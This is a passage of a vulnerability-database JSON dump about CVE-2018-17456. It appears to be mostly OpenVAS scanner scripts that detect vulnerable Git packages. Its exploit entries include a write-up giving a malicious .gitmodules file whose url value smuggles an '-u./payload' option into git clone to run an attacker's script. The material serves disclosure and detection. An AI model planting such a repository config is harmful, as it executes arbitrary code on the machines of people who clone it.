rpm:\"git-web~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gitk\", rpm:\"gitk~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-doc\", rpm:\"git-doc~2.16.4~lp150.2.6.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:36:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181388", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181388", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2018-1388)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1388\");\n script_version(\"2020-01-23T11:24:13+0000\");\n script_cve_id(\"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:24:13 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:24:13 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2018-1388)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1388\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1388\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2018-1388 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"git: arbitrary code execution via .gitmodules (CVE-2018-17456)\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~20.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~20.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:33:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191183", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191183", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-1183)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1183\");\n script_version(\"2020-01-23T11:33:56+0000\");\n script_cve_id(\"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:33:56 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:33:56 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-1183)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-2\\.5\\.3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1183\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1183\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2019-1183 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An option injection flaw has been discovered in git when it recursively clones a repository with sub-modules. A remote attacker may configure a malicious repository and trick a user into recursively cloning it, thus executing arbitrary commands on the victim's machine.CVE-2018-17456\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS Virtualization 2.5.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-2.5.3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~20.h1\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~20.h1\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:35:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191291", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191291", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-1291)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1291\");\n script_version(\"2020-01-23T11:37:54+0000\");\n script_cve_id(\"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:37:54 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:37:54 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-1291)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1291\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1291\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2019-1291 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"git: arbitrary code execution via .gitmodules (CVE-2018-17456)\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~20.h1.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~20.h1.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:39:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2018-10-13T00:00:00", "id": "OPENVAS:1361412562310851934", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851934", "type": "openvas", "title": "openSUSE: Security Advisory for git (openSUSE-SU-2018:3109-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851934\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-13 06:54:28 +0200 (Sat, 13 Oct 2018)\");\n script_cve_id(\"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for git (openSUSE-SU-2018:3109-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for git fixes the following issues:\n\n - CVE-2018-17456: Git allowed remote code execution during processing of a\n recursive 'git clone' of a superproject if a .gitmodules file has a URL\n field beginning with a '-' character. (boo#1110949).\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-1147=1\");\n\n script_tag(name:\"affected\", value:\"git on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3109-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-10/msg00028.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-arch\", rpm:\"git-arch~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-core\", rpm:\"git-core~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-core-debuginfo\", rpm:\"git-core-debuginfo~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-gnome-keyring\", rpm:\"git-credential-gnome-keyring~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-gnome-keyring-debuginfo\", rpm:\"git-credential-gnome-keyring-debuginfo~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-cvs\", rpm:\"git-cvs~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon\", rpm:\"git-daemon~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon-debuginfo\", rpm:\"git-daemon-debuginfo~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-debugsource\", rpm:\"git-debugsource~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-email\", rpm:\"git-email~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-gui\", rpm:\"git-gui~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn\", rpm:\"git-svn~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn-debuginfo\", rpm:\"git-svn-debuginfo~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-web\", rpm:\"git-web~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gitk\", rpm:\"gitk~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-doc\", rpm:\"git-doc~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-06T16:45:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "The remote host is missing an update for the ", "modified": "2020-02-06T00:00:00", "published": "2020-02-04T00:00:00", "id": "OPENVAS:1361412562310883176", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310883176", "type": "openvas", "title": "CentOS: Security Advisory for emacs-git (CESA-2020:0316)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.883176\");\n script_version(\"2020-02-06T07:28:53+0000\");\n script_cve_id(\"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-06 07:28:53 +0000 (Thu, 06 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-04 04:00:25 +0000 (Tue, 04 Feb 2020)\");\n script_name(\"CentOS: Security Advisory for emacs-git (CESA-2020:0316)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n\n script_xref(name:\"CESA\", value:\"2020:0316\");\n script_xref(name:\"URL\", value:\"https://lists.centos.org/pipermail/centos-announce/2020-February/035619.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'emacs-git'\n package(s) announced via the CESA-2020:0316 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Git is a distributed revision control system with a decentralized\narchitecture. As opposed to centralized version control systems with a\nclient-server model, Git ensures that each working copy of a Git repository\nis an exact copy with complete revision history. This not only allows the\nuser to work on and contribute to projects without the need to have\npermission to push the changes to their official repositories, but also\nmakes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n * git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\");\n\n script_tag(name:\"affected\", value:\"'emacs-git' package(s) on CentOS 6.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"CentOS6\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"emacs-git\", rpm:\"emacs-git~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"emacs-git-el\", rpm:\"emacs-git-el~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-all\", rpm:\"git-all~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-cvs\", rpm:\"git-cvs~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon\", rpm:\"git-daemon~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-email\", rpm:\"git-email~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-gui\", rpm:\"git-gui~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gitk\", rpm:\"gitk~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn\", rpm:\"git-svn~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gitweb\", rpm:\"gitweb~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:17", "description": "\nGit Submodule - Arbitrary Code Execution (PoC)", "edition": 1, "published": "2018-10-05T00:00:00", "title": "Git Submodule - Arbitrary Code Execution (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17456"], "modified": "2018-10-05T00:00:00", "id": "EXPLOITPACK:2356A63C4E4DC65BBDDE2BC00C9D7F2F", "href": "", "sourceData": "These releases fix a security flaw (CVE-2018-17456), which allowed an\nattacker to execute arbitrary code by crafting a malicious .gitmodules\nfile in a project cloned with --recurse-submodules.\n\nWhen running \"git clone --recurse-submodules\", Git parses the supplied\n.gitmodules file for a URL field and blindly passes it as an argument\nto a \"git clone\" subprocess. If the URL field is set to a string that\nbegins with a dash, this \"git clone\" subprocess interprets the URL as\nan option. This can lead to executing an arbitrary script shipped in\nthe superproject as the user who ran \"git clone\".\n\nIn addition to fixing the security issue for the user running \"clone\",\nthe 2.17.2, 2.18.1 and 2.19.1 releases have an \"fsck\" check which can\nbe used to detect such malicious repository content when fetching or\naccepting a push. See \"transfer.fsckObjects\" in git-config(1).\n\nCredit for finding and fixing this vulnerability goes to joernchen\nand Jeff King, respectively.\n\nP.S. Folks at Microsoft tried to follow the known exploit recipe on\nGit for Windows (but not Cygwin or other Git implementations on\nWindows) and found that the recipe (or its variants they can think\nof) would not make their system vulnerable. This is due to the fact\nthat the type of submodule path require by the known exploit recipe\ncannot be created on Windows. Nonetheless, it is possible we have\nmissed some exploitation path and users are encouraged to upgrade.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:17", "description": "\nGit Submodule - Arbitrary Code Execution", "edition": 1, "published": "2018-10-16T00:00:00", "title": "Git Submodule - Arbitrary Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-10-16T00:00:00", "id": "EXPLOITPACK:D64F350BE20BAAEB14556BDB6D8B4C0D", "href": "", "sourceData": "# CVE-2018-17456\n\nI've gotten a couple of questions about exploitation for the\n[recent RCE](https://marc.info/?l=git&m=153875888916397&w=2) in Git. So here we\ngo with some technical details.\n\n## TL;DR\n\n[Here](https://github.com/joernchen/poc-submodule) is a PoC repository.\nEDB Note: Mirror ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45631.zip\n\n## Exploitation\n\nThe `.gitmodules` file looks as follows:\n\n```\n[submodule \"x:x\"]\n\tpath = x:x\n\turl = -u./payload\n```\n\nThe actual command being injected is set by the url, `-u./payload`\npoints the `upload-pack` flag of git clone to the `payload` shell\nscript. Note also the `:` within the path, this part is needed to\nactually get the `payload` script executed.\n\nThe path will end up as the repository URL in the subsequent `clone`\noperation:\n\n```\nexecve(\"/usr/lib/git-core/git\", [\"/usr/lib/git-core/git\", \"clone\",\n\"--no-checkout\", \"--progress\", \"--separate-git-dir\",\n\"/tmp/huhu/.git/modules/x:x\", \"-u./payload\", \"/tmp/huhu/x:x\"],...\n```\n\nAs the actual URL from `.gitmodules` is interpreted as the `-u`\nargument.\n\nThe colon is due to the fact, that the colon character let us go past\nthose lines in `transport.c`:\n\n```c\n } else if (url_is_local_not_ssh(url) && is_file(url) && is_bundle(url, 1)) {\n struct bundle_transport_data *data = xcalloc(1, sizeof(*data));\n transport_check_allowed(\"file\");\n ret->data = data;\n ret->vtable = &bundle_vtable;\n ret->smart_options = NULL;\n```\n\nDue to `url_is_local_not_ssh` will return false due to the colon\nin the path. And therefore later on in the code the smart_options\ncontaining the `uploadpack` setting are still in place:\n\n```c\n } else {\n\t\t/* Unknown protocol in URL. Pass to external handler. */\n\t\tint len = external_specification_len(url);\n\t\tchar *handler = xmemdupz(url, len);\n\t\ttransport_helper_init(ret, handler);\n\t}\n\n\tif (ret->smart_options) {\n\t\tret->smart_options->thin = 1;\n\t\tret->smart_options->uploadpack = \"git-upload-pack\";\n\t\tif (remote->uploadpack)\n\t\t\tret->smart_options->uploadpack = remote->uploadpack;\n\t\tret->smart_options->receivepack = \"git-receive-pack\";1\n\t\tif (remote->receivepack)\n\t\t\tret->smart_options->receivepack = remote->receivepack;\n\t}\n```\n\n## Further hints\n\nThe constraint to have a colon in the `path` seems to hinder exploitation on Windows\nas a colon is a forbidden character within a path on Windows. However as noted by\nsome people during the disclosure: Git running within the Windows Subsystem for Linux or\ncygwin will allow exploitation on Windows hosts.\n\nEtienne Stalmans who found [a similar issue](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/)\nearlier this year managed to exploit this argument injection [using `--template`](https://twitter.com/_staaldraad/status/1049241254939246592).", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:47:12", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git 